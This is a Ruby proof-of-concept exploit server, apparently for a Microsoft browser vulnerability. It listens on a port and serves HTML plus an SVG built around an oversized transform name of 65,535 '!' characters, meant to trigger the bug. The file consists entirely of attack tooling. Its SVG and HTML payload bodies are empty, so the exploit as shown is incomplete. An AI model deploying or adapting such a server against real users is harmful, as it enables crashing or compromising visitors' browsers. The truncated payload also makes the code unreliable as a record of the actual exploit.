#!/usr/bin/env ruby
# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson
require 'socket'
def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
opts = defaults.merge(opts)
code = opts[:code]
message = opts[:message]
type = opts[:type]
date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
headers = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: #{date_str}\r\n" +
"Content-Length: #{data.length}\r\n" +
"Content-Type: #{type}\r\n\r\n"
puts "[+] Sending #{opts[:desc]}"
sock.write(headers + data) rescue return false
return true
end
def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
puts " " + out_str.split("\n")[0]
return true
else
sock.close
return false
end
rescue Exception => ex
return false
end
end
port = ARGV[0] || 55555
transform_name = "\x21" * 65535
svg = <<-SVG
SVG
html = <<-HTML
HTML
puts "[+] Listening on port #{port}"
puts
TCPServer.open(port) do |srv|
while true
cli = srv.accept
req = ""
next unless sock_read(cli, req, 5)
while req.length > 0
if req =~ /GET.*svg/i
break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
elsif req =~ /QUIT/
exit()
else
break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
end
req = ""
next unless sock_read(cli, req, 5)
end
cli.close rescue next
end
end